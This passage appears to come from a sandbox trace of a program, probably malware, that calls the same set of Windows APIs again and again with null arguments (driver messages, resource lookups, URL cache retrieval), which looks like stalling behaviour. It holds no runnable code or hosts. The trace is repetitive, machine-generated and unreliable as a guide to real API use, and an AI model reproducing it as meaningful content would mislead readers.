lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.909] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.910] GetUserDefaultLangID () returned 0x409 [0185.910] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.910] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.910] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.910] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.910] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.910] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.910] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.910] GetUserDefaultLangID () returned 0x409 [0185.910] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.910] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.910] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.910] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.910] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.910] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.910] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.910] GetUserDefaultLangID () returned 0x409 [0185.910] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.910] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.910] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.910] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.910] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.910] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.910] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.910] GetUserDefaultLangID () returned 0x409 [0185.910] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.910] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.910] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.910] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.910] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.910] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.910] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.910] GetUserDefaultLangID () returned 0x409 [0185.910] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.910] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.910] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.910] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.910] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.910] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.910] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.910] GetUserDefaultLangID () returned 0x409 [0185.910] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.910] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.910] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.910] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.910] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.910] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.911] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.911] GetUserDefaultLangID () returned 0x409 [0185.911] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.911] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.911] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.911] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.911] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.911] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.911] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.911] GetUserDefaultLangID () returned 0x409 [0185.911] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.911] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.911] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.911] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.911] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.911] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.911] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.911] GetUserDefaultLangID () returned 0x409 [0185.911] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.911] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.911] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.911] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.911] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.911] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.911] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.911] GetUserDefaultLangID () returned 0x409 [0185.911] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.911] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.911] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.911] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.911] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.911] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.911] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.911] GetUserDefaultLangID () returned 0x409 [0185.911] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.911] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.911] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.911] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.911] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.911] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.911] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.911] GetUserDefaultLangID () returned 0x409 [0185.911] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.911] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.911] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.911] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.911] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.911] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.912] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.912] GetUserDefaultLangID () returned 0x409 [0185.912] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.912] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.912] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.912] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.912] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.912] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.912] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.912] GetUserDefaultLangID () returned 0x409 [0185.912] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.912] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.912] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.912] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.912] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.912] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.912] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.912] GetUserDefaultLangID () returned 0x409 [0185.912] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.912] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.912] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.912] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.912] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.912] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.912] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.912] GetUserDefaultLangID () returned 0x409 [0185.912] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.912] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.912] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.912] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.912] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.912] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.912] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.912] GetUserDefaultLangID () returned 0x409 [0185.912] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.912] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.912] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.912] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.912] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.912] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.912] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.912] GetUserDefaultLangID () returned 0x409 [0185.912] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.912] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.912] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.912] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.913] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.913] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.913] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.913] GetUserDefaultLangID () returned 0x409 [0185.913] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.913] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.913] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.913] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.913] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.913] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.913] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.913] GetUserDefaultLangID () returned 0x409 [0185.913] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.913] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.913] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.913] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.913] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.913] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.913] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.913] GetUserDefaultLangID () returned 0x409 [0185.913] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.913] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.913] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.913] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.913] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.913] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.913] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.913] GetUserDefaultLangID () returned 0x409 [0185.913] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.913] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.913] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.913] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.913] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.913] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.913] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.913] GetUserDefaultLangID () returned 0x409 [0185.913] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.913] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.913] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.913] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.913] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.913] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.913] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.913] GetUserDefaultLangID () returned 0x409 [0185.913] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.913] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.913] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.914] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.914] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.914] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.914] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.914] GetUserDefaultLangID () returned 0x409 [0185.914] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.914] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.914] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.914] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.914] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.914] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.914] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.914] GetUserDefaultLangID () returned 0x409 [0185.914] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.914] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.914] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.914] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.914] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.914] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.914] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.914] GetUserDefaultLangID () returned 0x409 [0185.914] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.914] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.914] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.914] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.914] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.914] 